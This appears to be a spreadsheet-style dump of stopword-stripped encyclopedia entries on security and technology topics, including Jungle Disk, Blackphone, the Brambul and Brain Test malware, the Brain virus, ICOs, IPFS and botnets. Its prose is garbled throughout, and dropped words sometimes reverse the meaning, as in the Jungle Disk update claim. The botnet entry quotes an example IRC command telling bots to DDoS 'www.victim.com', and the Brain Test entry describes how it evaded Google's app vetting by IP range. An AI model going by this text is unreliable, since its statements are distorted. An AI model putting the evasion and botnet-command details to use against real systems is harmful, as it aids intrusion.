    <t>jungle disk name online backup software service privately held data security company. first backup services cloud storage amazon 2009 acquired rackspace service added rackspace cloud files. name word association amazon rainforest jungle disk common shorthand hard disk drive. backup service overview jungle disk backup monthly subscription software service supports laptops, desktops, servers microsoft windows, macos, linux operating systems. data backed online disk using either continuous backup (aka. sync) scheduled back selected files, folders, everything system. data accessed software client, browser, mobile devices running android ios. also provides webdav server integration applications. customers protect data using aes-256 encryption even jungle disk employees cannot access records. each subscription includes gigabytes storage pay-as-you-go additional data. history jungle disk founded atlanta dave wright 2006. october 2008, jungle disk entered agreement acquired rackspace hosting, inc. rackspace purchased jungle disk order expand cloud hosting services. after acquisition integration dave left rackspace found solidfire jungle disk relocated antonio 2010. pace development slowed rackspace focused cloud infrastructure software platform became openstack. 2013, rackspace revived jungle disk customer support going ticket service include phone, chat ticketing. january 2016, jungle disk spun rackspace inc. privately held company headquartered antonio, tx.on december 2017, jungle disk announced acquired safetynet, first backup quickbooks online, jobber.in 2022, acquired online backup company elephantdrive. criticism jungle disk client software receive update 2012-2014 part cloud office portfolio version released december 2015.on june 2011, colin percival, owner tarsnap competitor jungle disk), identified potential weaknesses jungle disk's security: lack message authentication code means file corruption (accidental deliberate) arbitrary file content insertions detected attacker bypass amazon rackspace security directly modify data cloud files. derivation function makes computationally feasible perform brute-force attack jungle disk password. also list online backup services comparison online backup services references external links official website jungle disk blog review magazine review macworld magazine</t>
  </si>
  <si>
    <t>Blackphone</t>
  </si>
  <si>
    <t>blackphone smartphone built ensure privacy, developed technologies, wholly owned subsidiary silent circle. originally, technologies joint venture makers geeksphone silent circle. marketing focused upon business users, stressing employees often conduct business using private devices services secure blackphone service readily provides users options ensure confidentiality needed. blackphone provides internet access vpn. device runs modified version android called silentos comes bundle security-minded tools.versions blackphone sold 2014–2016. while precise sales figures released, widely speculated financial disappointment resulting near-bankruptcy silent circle combined silent circle canceling phone. background concept encrypted telephone interest silent circle founder creator, phil zimmermann, long time. video blackphone site, zimmermann said, wait rest technology infrastructure catch make possible secure telephony. kind detour waiting rest technology catch make really good secure telephony possible. aaron souppouris verge wrote "the blackphone looks like fairly standard android phone. 4.7-inch (the exact resolution announced) display, 2ghz quad-core processor, 16gb storage, 8-megapixel camera, pretty much everything want smartphone, little wouldn't."the blackphone also allows insecure communications. mike janke, co-founder silent circle, suggested certain calls people want encrypt, ordering pizza calling grandma", unlikely feel weight criminals shoulders."blackphone runs custom-built android called silentos. some major features silentos anonymous search, privacy-enabled bundled apps, smart disabling wi-fi except trusted hotspots, control permissions, private communication (calling, texting, video chat, browsing, file sharing, conference calls). geeksphone also claims telephone receive frequent secure updates blackphone directly.it supports following bands, respectively: north america (region2): gsm: 1800 1900 mhz; hspa+/wcdma: 1700 1900 2100 mbit/s); bands: 4/7/17 (cat. mbit/s) rest world (region1): gsm: 1800 1900 mhz; hspa+/wcdma: 1900 2100 mbit/s); bands 3/7/20 (cat. mbit/s)lte cat. (150 mbit/s) development. june 2014, blackphone began ship advance orders. early 2015, geeksphone sold part technologies silent circle focus wearables sold brand geeksme. engineers geeksphone, including javier agüera, remained sgp.silent circle released successor blackphone, blackphone september 2015. 5.5-inches full screen gorilla glass, qualcomm snapdragon octa-core processor. price increased us$799.00. services bundled one-year subscription silent circle’s secure voice video calling text messaging services, plus one-year "friend family" silent circle subscription allows others install service smartphones. year spideroak cloud file storage sharing, limited month.kismet smart wi-fi manager comes pre-installed. also includes international power adapter headset. reception technica praised blackphone's security center privatos gives control permissions, bundled silent phone silent text services anonymise encrypt communications eavesdrop voice, video, text calls. they also praised disconnect search keeps trackers telephone anonymises searches internet traffic. technica reviewer like telephone’s performance mediocre, noting using custom means google play benefits google ecosystem, spotty support sideloaded apps, reliance amazon third-party stores.as june 2015, blackphone exhibit victoria albert museum added collection international museum. financial difficulties 2016, silent circle significant financial problems, caused significant overestimate many phones could sell. this near bankruptcy company. point 2010s, silent circle stopped selling blackphones, although still offer privacy software intended off-the-shelf phones. references further reading fox-brewster, thomas july 2016). "sorry privacy lovers, blackphone flirting with failure". forbes. gibbs, samuel july 2016). know people care privacy, it?". guardian. external links official website</t>
  </si>
  <si>
    <t>Brambul</t>
  </si>
  <si>
    <t>brambul protocol computer worm decrypts automatically moves computer second computer. responsible dropping joanap botnet. history brambul first discovered 2009 disclosure prior notoriety. observed cybersecurity firms extensive subject. sony hack (late 2014) brambul among malware identified sony pictures hack. investigation (early 2019) brambul well joanap botnet shut court order. cycle computer worm ability automatically scan addresses decrypt passwords including, limited following. system drive share brambul share information system cyberattacker. information shared includes address, hostname username password. references external links hidden cobra joanap backdoor trojan brambul server message block worm cisa</t>
  </si>
  <si>
    <t>Indian Seed Vault</t>
  </si>
  <si>
    <t>indian seed vault secure seed bank lies high-altitude mountain pass chang seed vault ladakh, india. built 2010 jointly defence institute high altitude research national bureau plant genetic resources, seed bank second largest world. history (beej bachao andolan save seeds movement) began late 1980s uttarakhand, india, vijay jardhari. seed banks created store native varieties seeds. seed storage stores 10,000 seeds accessions plant species. these seeds include apricots, barley, cabbage, carrots, radish, potatoes, tomatoes, rice, wheat, etc., based qualities yield resistance temperature, pests humidity. also svalbard global seed vault references</t>
  </si>
  <si>
    <t>Indicator of compromise</t>
  </si>
  <si>
    <t>indicator compromise (ioc) computer forensics artifact observed network operating system that, high confidence, indicates computer intrusion. types indication typical iocs virus signatures addresses, hashes malware files, urls domain names botnet command control servers. after iocs identified process incident response computer forensics, used early detection future attack attempts using intrusion detection systems antivirus software. automation there initiatives standardize format descriptors efficient automated processing. known indicators usually exchanged within industry, traffic light protocol used. also alienvault mandiant malware malware information sharing platform references</t>
  </si>
  <si>
    <t>Brain Test</t>
  </si>
  <si>
    <t>brain test piece malware masquerading android tested users brain test discovered security firm check point available google play store september 2015. check point described brain test level sophistication malware".brain test uploaded occasions (com.zmhitlte.brain com.mile.brain), starting august 2015, times google's "bouncer" failed detect malware. after first removal august 2015 software reintroduced using obfuscation technique. erin tripwire said "bypassing vetting processes apple google keystone mobile malware campaign." malware turned include rootkit, revelation described "more cunning first thought".the malware thought written chinese actor, according shaulov check point, based packing/obfuscation tool baidu. eleven paths, telefonica-owned company, found links pieces malware, based used access umeng, internet domains accessed apps shared images.it appears first detected nexus using check point's mobile threat prevention system. fact system unable remove malware alerted software company's researchers unusual threat. according check point, necessary re-flash device brain test successfully installed reinstaller system directory. features malware uploaded forms. packing feature present second. evades detection google bouncer avoiding malicious behavior google servers addresses 209.85.128.0–209.85.255.255, 216.58.192.0–216.58.223.255, 173.194.0.0–173.194.255.255, 74.125.0.0–74.125.255.255, domain names "google", "android" "1e100". root exploits. four exploits gain root access system included, account variations kernel drivers different manufacturers android versions, provide alternative paths root. external payloads command control system. system used five external servers provide variable payload, believed primarily advertising related. packing time delay. main downloaded malware portion sits sound file, bootstrap code unpacks time delay. dual install re-install. copies malware installed. removed re-installs also shedun xcode ghost references external links detailed coverage forbes video graham cluley brain test washington post.</t>
  </si>
  <si>
    <t>Brain (computer virus)</t>
  </si>
  <si>
    <t>brain industry standard name computer virus released first form january 1986, considered first computer virus personal computer (ibm compatibles. description brain affects replacing boot sector floppy disk copy virus. real boot sector moved another sector marked bad. infected disks usually five kilobytes sectors. disk label usually changed ©brain, following text seen infected boot sectors: welcome dungeon 1986 amjads (pvt) virus_shoe record v9.0 dedicated dynamic memories millions viruses longer today thanks goodness!!! beware er..virus program catching program follows messages....$#@%$@!!there many minor major variations version text. virus slows floppy disk drive makes seven kilobytes memory unavailable dos. brain written amjad farooq alvi basit farooq alvi, time lived chah miran, near lahore railway station, lahore, pakistan. brothers told time magazine written protect medical software illegal copying, supposed target copyright infringement only. cryptic message "welcome dungeon", safeguard reference early programming forum dungeon bbs, appeared year brothers licensed beta version code. brothers could contacted receive final release version program. brain lacks code dealing hard disk partitioning, avoids infecting hard disks checking significant bios drive number accessed. brain infect disk set, unlike viruses time, paid attention disk partitioning consequently destroyed data stored hard disks treating floppy disks. brain often went undetected, partially deliberate non-destructiveness, especially user paid little attention speed floppy disk access. virus came complete brothers' address three phone numbers, message told user machine infected call inoculation: welcome dungeon 1986 basit amjads (pvt). brain computer services nizam block allama iqbal town lahore-pakistan phone: 430791,443248,280530. beware virus.... contact vaccination...this program originally used track heart monitoring program people distributing illicit copies disks. this tracking program supposed stop track illegal copies disk, however program also sometimes used last five kilobytes apple floppy, making additional saves disk programs impossible. author response when brothers began receive large number phone calls people united kingdom, united states, elsewhere, demanding disinfect machines, stunned tried explain outraged callers motivation malicious. their phone lines overloaded. brothers, another brother, shahid farooq alvi, continued business pakistan, brain internet service providers company called brain telecommunication limited. 2011, years brain released, mikko hyppönen f-secure traveled pakistan interview amjad documentary. being inspired documentary wide spread, group pakistani bloggers interviewed amjad, banner bloggerine. also iqbal town, lahore rootkit timeline computer viruses worms references external links "brainnet website". archived original 2005-02-04. retrieved 2004-05-01. description (c)brain f-secure site brain searching first virus pakistan archived 2011-07-25 wayback machine information brain virus variants textfiles.com talk mikko hyppönen fighting viruses, defending pakistani brain (ibm ms-dos computer virus) impact</t>
  </si>
  <si>
    <t>Boxbe</t>
  </si>
  <si>
    <t>boxbe free service prioritizes screens spam personal email. users select email want receive, email goes spam. presents challenge sender requires human response. bulk anonymous data provided parent company, provides email validation tracking service. service boxbe starts user allowing boxbe access user's email contacts. boxbe gives priority contacts users allow. integration within gmail (including google apps), aol, yahoo! mail affiliates lets boxbe stay date screen email. history boxbe founded 2005 thede loder corbett barr. venture capital firm draper fisher jurvetson esther dyson investors, dyson steve jurvetson serving board members. filter spam beyond challenge response, boxbe initially used option allowing recipients define price senders must risk deliver initial message (paying deliver email, called attention bond mechanism), later abandoned. boxbe company founder thede loder along marshall alstyne rick wash wrote initial paper attention bond mechanism. technically capable users assemble many functions, whitelisting. acquisition 2012, edatasource, inc. purchased assets boxbe, inc. also comparison email services references external links official site official blog</t>
  </si>
  <si>
    <t>Initial coin offering</t>
  </si>
  <si>
    <t>initial coin offering (ico) initial currency offering type funding using cryptocurrencies. often form crowdfunding, although private seek public investment also possible. ico, quantity cryptocurrency sold form "tokens" ("coins") speculators investors, exchange legal tender (generally established stable) cryptocurrencies bitcoin ether. tokens promoted future functional units currency ico's funding goal project successfully launches. source capital startup companies. icos allow startups avoid regulations prevent seeking investment directly public, intermediaries venture capitalists, banks, stock exchanges, demand greater scrutiny percentage future profits joint ownership. icos fall outside existing regulations, depending nature project, banned altogether jurisdictions, china south korea. lack regulation enforcement securities law, icos vehicle scams fraud. fewer half icos survive four months offering, almost half icos sold 2017 failed february 2018. despite record failure falling prices cryptocurrencies, record billion raised january–june 2018. history first token sale (also known ico) held mastercoin july 2013. ethereum raised money token sale 2014, raising around 31,000 july, equal approximately $18.3 million time.icos token sales became popular 2017. there least websites tracking icos mid-year. may, browser called brave generated million seconds. messaging developer kik's september 2017 raised nearly $100 million. start october 2017, coin sales worth $2.3 billion conducted year, times much 2016. november 2017, around offerings month, highest-grossing january 2018, filecoin raising $257 million (and $200 million within first hour token sale).by 2017, icos raised almost times much capital raised 2016, although still amounting less percent capital raised ipos. icos sometimes called "token sales". wan, crowdfunding syndication lawyer, described coin symbol ownership interest enterprise—a digital stock certificate" stating likely subject regulation securities u.s. howey test.ethereum february 2018) leading blockchain platform icos market share. tokens generally based ethereum erc-20 standard.on january 2018, facebook banned advertisements icos well cryptocurrencies binary options. april 2018, advertising banned facebook, twitter, google, mailchimp. facebook since changed mind june 2018 announced reopen approved advertisers.efforts deploy technology represent regulated securities, referred security token offerings (stos), digital security offerings (dsos), listed regulated stock exchange, tokenized ipos.an initial stake-pool offering (ispo), also known iso, novel variation funding cryptocurrency projects. ispo, users stake cryptocurrency holdings (mostly notably ada) stake-pool operated cryptocurrency project.the first formal ispo, successful, launched july, 1st, 2021. october 2021 35,000 participants across world contributed million (worth billion october 2021). participants received 0.065 $meld $ada staked epoch keeping full ownership ada. criticisms mechanism scams although icos used fraud, also used legal activities corporate finance charitable fundraising. securities exchange commission (sec) warned investors beware scammers using icos execute "pump dump" schemes, scammer talks value order generate interest drive value coins, quickly "dumps" coins profit.snapchat, linkedin mailchimp limited companies marketing icos platforms. jimmy wales, founder wikipedia, stated 2017 "there initial coin offerings opinion absolute scams people wary things going area."chinese internet platforms baidu, tencent, weibo also prohibited advertisements. japanese platform line russian platform yandex similar prohibitions.the financial conduct authority warned icos high risk speculative investments, scams cases, often offer protections investors. even cases legitimate icos, funded projects typically early therefore high-risk stage development. european securities markets authority (esma) notes high risks associated icos risk investors lose cash. bubble 2017 wired article predicted 2017 bubble burst. some investors flooded icos hopes participating financial gains similar size enjoyed early bitcoin ethereum speculators. regulation following speculative boom cryptocurrency prices peaked december 2017, regulation cryptocurrencies rapidly changing. pace change driven part incidents cybertheft, trading halts, possible market manipulation.cryptocurrencies based distributed ledger technologies enable anyone purchase transfer cryptocurrency holdings person without need intermediary (such exchange) update central record ownership. cryptocurrencies transferred easily across national jurisdictional boundaries. this makes difficult central authorities control monitor ownership movement holdings cryptocurrencies. countries different approaches regulate cryptocurrencies. this depend nature cryptocurrency itself. there main types cryptocurrencies regulatory perspective: utility tokens asset-backed tokens. utility tokens value enable holder exchange token good service future, bitcoin. asset-backed tokens value underlying asset holder token attribute value many countries uncertain whether utility tokens require regulation, likely asset-backed tokens require regulation. this makes complex issuers cryptocurrencies analyse countries tokens coins) sold into, prospective purchasers cryptocurrencies understand regulations, any, apply. gibraltar british overseas territory financial services commission announced early february 2018 regulations developed qualify "authorized sponsors" icos, supposed "responsible assuring compliance disclosure" compliance "financial crimes rules". also alternative currency airdrop digital asset private currency references</t>
  </si>
  <si>
    <t>Initial exchange offering</t>
  </si>
  <si>
    <t>initial exchange offering (ieo) cryptocurrency exchange equivalent stock launch initial public offering (ipo). process digital asset (e.g. coins tokens) procurement established exchange purpose raising capital start-up companies. exchanges middleman investors startup, profiting fees generated services rendered diligence process funding phase. ieo's initial coin offerings (ico) share similar characteristics another, however, seen evolution legal influence increase financial regulations within cryptocurrency market history first major exchange january 2019, launch binance's platform binance launchpad. first platform bittorrent tokens (btt) raised $7.1 million less minutes. since 2019, binance launched projects total $133 million raised. binance's venture field invited exchanges offer similar services. advantages ieo's allow startup companies participate large scale fundraising trustworthy intermediary verify transactions manage funds generate capital generation process. unlike initial coin offering (ico) startup need manage conduct fundraising process. duties handled exchange execute transactions, manage currency wallets transferring funds different blockchains customer wallets. ieo's allow companies startups raise capital sale tokens coin cryptocurrency exchange. this reduces investor risk diligence vetting completed exchange. utility tokens allow investors business mutual benefit additional access given holders given business utility token. ieo's create safer investment ecosystem providing access investment opportunities trusted platform. ieo's exchanges brand promote projects platforms users giving startup larger invest pool raise capital. disadvantages ieo's allow startups participate large scale investments opportunities introduction business large investment ecosystem. ieo's vastly secure method investment procurement startups, comes cost fees paid exchange time analyzing business predetermined percentage capital raised. fees rendered research stage development percentage total revenue earned. exchanges vary security level overall quality, thus ieo's less effective risk pump dump schemes still present ieo's procedure successful follow specific guidelines diligence stage selection. since exchanges using company brand promote invite investors purchase startups token utility coin insure project company reliable trustworthy. platforms promote startups analyze businesses white paper, team, business plan, tech assess tokenomics business. exchanges analyze business insure business plans projects values exchange. this saves exchange damaging reputation insures business following global legal requirements anti-money laundering cryptocurrency sales.ref&gt;"fedlex". www.fedlex.admin.ch. retrieved 2022-03-28.&lt;/ref&gt; regulation following major rise ieo's 2019 many regulatory agency created legal restrictions. securities exchange committee commented ieo's stating:"be cautious considering investment ieo. claims technologies financial products, associated digital asset offerings, claims ieos vetted trading platforms, used improperly entice investors false promise high returns investment space. described below, ieos conducted violation federal securities laws lack many investor protections registered exempt securities offerings." 2022, regulation major industries limited nations implemented level restriction. registered national security exchanges automated trading systems (atss) governed federal laws regulations aimed protecting investors preventing fraudulent manipulative trading practices. several online trading platforms mislead investors believing registered meet regulatory requirements national securities exchange ats, provide investors investor protections exchanges atss provide. failing comply federal securities laws, and/or trading platform operating unlawfully offering investors market protections remedies laws designed provide. consider carefully whether trading platform company involved complied federal securities laws. flags following signs fraud illegal behaviour, stated sec: absence discussion reference u.s. federal securities laws, online trading platform considered flag. offering declares avoid federal securities laws united states occurring overseas trading platform, nonetheless allows investors invest, regarded flag. ieos claim vetted trading platforms flag. security offered violate federal securities laws regardless whether trading platform vetted offering.further, cautioned thing "sec-approved ieo." references further reading "initial exchange offering (ieo) definition". binance.vision. archived original 2019-10-31. retrieved 2019-11-01.</t>
  </si>
  <si>
    <t>Initiative for Open Authentication</t>
  </si>
  <si>
    <t>initiative open authentication (oath) industry-wide collaboration develop open reference architecture using open standards promote adoption strong authentication. close thirty coordinating contributing members proposing standards variety authentication technologies, lowering costs simplifying functions. terminology name oath acronym phrase "open authentication", pronounced english word "oath".oath related oauth, open standard authorization. also hotp: hmac-based one-time password algorithm (rfc 4226) totp: time-based one-time password algorithm (rfc 6238) ocra: oath challenge-response algorithm (rfc 6287) portable symmetric container (pskc) (rfc 6030) dynamic symmetric provisioning protocol (dskpp) (rfc 6063) fido alliance references external links official website list oath members oath specifications</t>
  </si>
  <si>
    <t>Instrodi</t>
  </si>
  <si>
    <t>instrodi (instituto strohalm desenvolvimento integral) branch social trade organization (stro) brazil. stro netherlands. originally named strohalm, foundation seeks development sustainable economies development regions. often, sufficient natural resources available regions, well talented people. when local development slowed supraregional economic factors, stro tries stimulate local development leveraging socio-economic communities. initiating barter-like networks using complementary currencies, local talent entrepreneurship strengthened. support complementary currencies, stro developed internet trading software named cyclos. currently, stro running projects brazil, central america, netherlands. external links www.socialtrade.org www.cyclos.org</t>
  </si>
  <si>
    <t>Intego</t>
  </si>
  <si>
    <t>intego windows security software company founded 1997 jean-paul florencio laurent marteau.the company creates internet security software macos windows, including: antivirus, firewall, anti-spam, backup software data protection software. intego currently offices u.s. seattle, washington, austin, texas, international offices paris, france, nagano, japan. intego's products universal binaries, supported several languages: english, french, german, japanese, spanish, previously italian. history co-founded former laurent marteau jean-paul florencio based paris, france, intego released first antivirus product 1997: rival, antivirus years later july 1999, intego released netbarrier, first personal security software suite then october 2000, intego released legacy antivirus software, virusbarrier 1.0, 9.intego launched security blog, blog covers security news, apple security updates, malware alerts, well news opinion pieces related apple products, mid-2007. company launched podcast october 2017, called intego podcast.intego released current version antivirus security software june 2016, since several under-the-hood updates, including compatibility macos releases apple silicon processors.kape technologies announced july 2018 acquiring intego "enhance [kape's] arsenal products cyber protection."intego released windows version antivirus software july 2020.intego's newest product intego privacy protection, solution macos windows launched circa june 2021. products virusbarrier netbarrier contentbarrier personal backup washing machine intego antivirus windows intego privacy protection remote management console fileguard (retired) personal antispam (retired) also antivirus internet security comparison antivirus software comparison computer viruses references external links official website</t>
  </si>
  <si>
    <t>Integrated Windows Authentication</t>
  </si>
  <si>
    <t>integrated windows authentication (iwa) term associated microsoft products refers spnego, kerberos, ntlmssp authentication protocols respect sspi functionality introduced microsoft windows 2000 included later windows nt-based operating systems. term used commonly automatically authenticated connections microsoft internet information services, internet explorer, active directory aware applications. also known several names like http negotiate authentication, authentication, ntlm authentication, domain authentication, windows integrated authentication, windows challenge/response authentication, simply windows authentication. overview integrated windows authentication uses security features windows clients servers. unlike basic digest authentication, initially, prompt users user name password. current windows user information client computer supplied browser cryptographic exchange involving hashing server. authentication exchange initially fails identify user, browser prompt user windows user account user name password. integrated windows authentication standard authentication protocol. when selected option program (e.g. within directory security site properties dialog) implies underlying security mechanisms used preferential order. kerberos provider functional kerberos ticket obtained target, associated settings permit kerberos authentication occur (e.g. intranet sites settings internet explorer), kerberos protocol attempted. otherwise ntlmssp authentication attempted. similarly, kerberos authentication attempted, fails, ntlmssp attempted. uses spnego allow initiators acceptors negotiate either kerberos ntlmssp. third party utilities extended integrated windows authentication paradigm unix, linux systems. supported browsers integrated windows authentication works modern browsers, work http proxy servers. therefore, best intranets clients within single domain. work browsers configured pass user's logon credentials server requesting authentication. where proxy requires ntlm authentication, applications like java work protocol described rfc-2069 proxy authentication. internet explorer later versions. mozilla firefox windows operating systems, names domains/websites authentication passed entered (comma delimited multiple domains) "network.negotiate-auth.trusted-uris" (for kerberos) "network.automatic-ntlm-auth.trusted-uris" (ntlm) preference name about:config page. macintosh operating systems works kerberos ticket (use negotiate). some websites also require configuring "network.negotiate-auth.delegation-uris". opera 9.01 later versions ntlm/negotiate, basic digest authentication offered server. google chrome works 8.0. safari works, kerberos ticket. microsoft edge later. supported mobile browsers bitzer secure browser supports kerberos ntlm android. both kinit pkinit supported. also sspi (security support provider interface) ntlm manager) spnego (simple protected gssapi negotiation mechanism) gssapi (generic security services application program interface) references external links discussion microsoft technical reference</t>
  </si>
  <si>
    <t>InterPlanetary File System</t>
  </si>
  <si>
    <t>interplanetary file system (ipfs) protocol, hypermedia file sharing peer-to-peer network storing sharing data distributed file system. ipfs uses content-addressing uniquely identify file global namespace connecting ipfs hosts.ipfs among others replace location based hypermedia server protocols http https distribute world wide web.the ipfs clients, requests gets data, ipfs clients share data. therefore ipfs embraces functionality cdn. ipfs advantages ipfs among others make redundant: location based server protocols http https mirror sites traditional file sharing protocols ftp, sftp ftps caching, proxy servers accelerators load balancers design ipfs allows users host receive content manner similar bittorrent. opposed centrally located server, ipfs built around decentralized system user-operators hold portion overall data, creating resilient system file storage sharing. user network serve file content address, peers network find request content node using distributed hash table (dht). contrast bittorrent, ipfs aims create single global network. this means users publish block data hash, peers downloading content "user also exchange data ones downloading "user ipfs aims replace protocols used static webpage delivery using gateways accessible http. users choose install ipfs client device instead public gateway. list gateways maintained ipfs github page. history ipfs created juan benet, later founded protocol labs 2014.ipfs launched alpha version february 2015, october year described techcrunch "quickly spreading word mouth." applications filecoin ipfs-based cooperative storage cloud. cloudflare runs distributed gateway simplify, speed secure access ipfs without needing local node. microsoft's self-sovereign identity system, microsoft ion, builds bitcoin blockchain ipfs sidetree-based network. brave uses origin protocol ipfs host decentralized merchandise store and, 2021, added support browser. opera android default support ipfs, allowing mobile users browse ipfs:// links access data ipfs network. anti censorship catalan independence referendum, taking place september–october 2017, deemed illegal constitutional court spain many related websites blocked. subsequently, catalan pirate party mirrored website ipfs bypass high court justice catalonia order blocking. during block wikipedia turkey, ipfs used create mirror wikipedia, allowed access content wikipedia despite ban. however, version wikipedia archived therefore static. malware phishing attacks also distributed cloudflare's ipfs gateway since july 2018. phishing scam html stored ipfs, displayed cloudflare's gateway. connection shows secure cloudflare certificate.the ipstorm botnet, first detected june 2019, uses ipfs hide command-and-control amongst flow legitimate data ipfs network. security researchers worked previously theoretical possibility using ipfs botnet command-and-control system. also content addressable storage (software) distributed file system freenet gnunet mnet (peer-to-peer network) mojonation zeronet references external links official website cloudflare public ipfs gateway jul, 2022, geeksforgeeks.org: interplanetary file system: 2022, howtogeek.com: what interplanetary file system (ipfs)</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>botnet group internet-connected devices, runs bots. botnets used perform distributed denial-of-service (ddos) attacks, steal data, send spam, allow attacker access device connection. owner control botnet using command control (c&amp;c) software. word "botnet" portmanteau words "robot" "network". term usually used negative malicious connotation. overview botnet logical collection internet-connected devices, computers, smartphones internet things (iot) devices whose security breached control ceded third party. each compromised device, known "bot," created device penetrated software malware (malicious software) distribution. controller botnet able direct activities compromised computers communication channels formed standards-based network protocols, hypertext transfer protocol (http).botnets increasingly rented cyber criminals commodities variety purposes. architecture botnet architecture evolved time effort evade detection disruption. traditionally, programs constructed clients communicate existing servers. this allows herder (the controller botnet) perform control remote location, obfuscates traffic. many recent botnets rely existing peer-to-peer networks communicate. these programs perform actions client–server model, require central server communicate. client–server model first botnets internet used client–server model accomplish tasks. typically, botnets operate internet relay chat networks, domains, websites. infected clients access predetermined location await incoming commands server. herder sends commands server, relays clients. clients execute commands report results back herder. case botnets, infected clients connect infected server join channel pre-designated herder. herder sends commands channel server. each client retrieves commands executes them. clients send messages back channel results actions. peer-to-peer response efforts detect decapitate botnets, herders begun deploying malware peer-to-peer networks. these bots digital signatures someone access private control botnet, gameover zeus zeroaccess botnet. newer botnets fully operate networks. rather communicate centralized server, bots perform command distribution server client receives commands. this avoids single point failure, issue centralized botnets. order find infected machines, bots discreetly probe random addresses identify another infected machine. contacted replies information software version list known bots. bots' version lower other, initiate file transfer update. this way, grows list infected machines updates periodically communicating known bots. core components botnet's originator (known "bot herder" "bot master") controls botnet remotely. this known command-and-control (c&amp;c). program operation must communicate covert channel client victim's machine (zombie computer). control protocols historically favored means communication protocol. herder creates channel infected clients join. messages sent channel broadcast channel members. herder channel's topic command botnet. example, message :herder!herder@example.com topic #channel ddos www.victim.com herder alerts infected clients belonging #channel begin ddos attack website www.victim.com. example response :bot1!bot1@compromised.net privmsg #channel ddosing www.victim.com client alerts herder begun attack.some botnets implement custom versions well-known protocols. implementation differences used detection botnets. example, mega-d features slightly modified simple mail transfer protocol (smtp) implementation testing spam capability. bringing mega-d's smtp server disables entire pool bots rely upon smtp server. zombie computer computer science, zombie computer computer connected internet compromised hacker, computer virus trojan horse used perform malicious tasks remote direction. botnets zombie computers often used spread e-mail spam launch denial-of-service attacks (ddos). most owners zombie computers unaware system used way. because owner tends unaware, computers metaphorically compared zombies. coordinated ddos attack multiple botnet machines also resembles zombie horde attack.the process stealing computing resources result system joined "botnet" sometimes referred "scrumping". command control botnet command control (c&amp;c) protocols implemented number ways, traditional approaches sophisticated versions. telnet telnet botnets simple botnet protocol bots connect main command server host botnet. bots added botnet using scanning script, runs external server scans ranges telnet server default logins. once login found, scanning server infect malware, pings control server. networks simple, bandwidth communication methods, making widely used host botnets. they tend relatively simple construction used moderate success coordinating ddos attacks spam campaigns able continually switch channels avoid taken down. however, cases, merely blocking certain keywords proven effective stopping irc-based botnets. 1459 (irc) standard popular botnets. first known popular botnet controller script, "maxite bot" using xdcc protocol private control commands. problem using client must know server, port, channel botnet. anti-malware organizations detect shut servers channels, effectively halting botnet attack. happens, clients still infected, typically dormant since receiving instructions. mitigate problem, botnet consist several servers channels. servers channels becomes disabled, botnet simply switches another. still possible detect disrupt additional botnet servers channels sniffing traffic. botnet adversary even potentially gain knowledge control scheme imitate herder issuing commands correctly. since botnets using networks domains taken time, hackers moved botnets make botnet resilient resistant termination. some also used encryption secure lock botnet others, time encryption public-key cryptography presented challenges implementing breaking domains many large botnets tend domains rather construction (see rustock botnet srizbi botnet). they usually hosted bulletproof hosting services. this earliest types c&amp;c. zombie computer accesses specially-designed webpage domain(s) serves list controlling commands. advantages using pages domains large botnet effectively controlled maintained simple code readily updated. disadvantages using method uses considerable amount bandwidth large scale, domains quickly seized government agencies little effort. domains controlling botnets seized, also easy targets compromise denial-of-service attacks. fast-flux used make difficult track control servers, change day. control servers also domain domain, domain generation algorithms used create names controller servers. some botnets free hosting services dyndns.org, no-ip.com, afraid.org point subdomain towards server harbors bots. while free services host attacks, provide reference points (often hard-coded botnet executable). removing services cripple entire botnet. others calling back large social media sites github, twitter, reddit, instagram, xmpp open source instant message protocol hidden services popular ways avoiding egress filtering communicate server. construction traditional this example illustrates botnet created used malicious gain. hacker purchases builds trojan and/or exploit uses start infecting users' computers, whose payload malicious application—the bot. instructs infected connect particular command-and-control (c&amp;c) server. (this allows botmaster keep logs many bots active online.) botmaster bots gather keystrokes form grabbing steal online credentials rent botnet ddos and/or spam service sell credentials online profit. depending quality capability bots, value increased decreased.newer bots automatically scan environment propagate using vulnerabilities weak passwords. generally, vulnerabilities scan propagate through, valuable becomes botnet controller community.computers co-opted botnet execute malicious software. this accomplished luring users making drive-by download, exploiting browser vulnerabilities, tricking user running trojan horse program, come email attachment. this malware typically install modules allow computer commanded controlled botnet's operator. after software downloaded, call home (send reconnection packet) host computer. when re-connection made, depending written, trojan delete remain present update maintain modules. others cases, botnet temporarily created volunteer hacktivists, implementations orbit cannon used 4chan members project chanology 2010.china's great cannon china allows modification legitimate browsing traffic internet backbones china create large ephemeral botnet attack large targets github 2015. common uses distributed denial-of-service attacks common uses botnets, multiple systems submit many requests possible single internet computer service, overloading preventing servicing legitimate requests. example attack victim's server. victim's server bombarded requests bots, attempting connect server, therefore, overloading google fraud czar shuman ghosemajumder said types attacks causing outages major websites continue occur regularly botnets service. spyware software sends information creators user's activities typically passwords, credit card numbers information sold black market. compromised machines located within corporate network worth herder, often gain access confidential corporate information. several targeted attacks large corporations aimed steal sensitive information, aurora botnet. e-mail spam e-mail messages disguised messages people, either advertising, annoying, malicious. click fraud occurs user's computer visits websites without user's awareness create false traffic personal commercial gain. fraud often consequence malicious activity, according cheq, fraud 2019, economic cost actors internet. commercial purposes bots include influencers using boost supposed popularity, online publishers using bots increase number clicks receives, allowing sites earn commission advertisers. credential stuffing attacks botnets many user accounts stolen passwords, attack general motors 2022. bitcoin mining used recent botnets include bitcoin mining feature order generate profits operator botnet. self-spreading functionality, seek pre-configured command-and-control (cnc) pushed instruction contains targeted devices network, infection, also spotted several botnets. some botnets utilizing function automate infections. market botnet controller community constantly competes bots, highest overall bandwidth, "high-quality" infected machines, like university, corporate, even government machines.while botnets often named malware created them, multiple botnets typically malware operated different entities. phishing botnets used many electronic scams. these botnets used distribute malware viruses take control regular users computer/software taking control someone's personal computer unlimited access personal information, including passwords login information accounts. this called phishing. phishing acquiring login information "victim's" accounts link "victim" clicks sent email text. survey verizon found around two-thirds electronic "espionage" cases come phishing. countermeasures geographic dispersal botnets means recruit must individually identified/corralled/repaired limits benefits filtering. computer security experts succeeded destroying subverting malware command control networks, among means, seizing servers getting internet, denying access domains used malware contact infrastructure, and, cases, breaking network itself. response this, operators resorted using techniques overlaying networks existing benign infrastructure tor, using peer-to-peer networking systems dependent fixed servers, using public encryption defeat attempts break spoof network.norton antibot aimed consumers, target enterprises and/or isps. host-based techniques heuristics identify behavior bypassed conventional anti-virus software. network-based approaches tend techniques described above; shutting servers, null-routing entries, completely 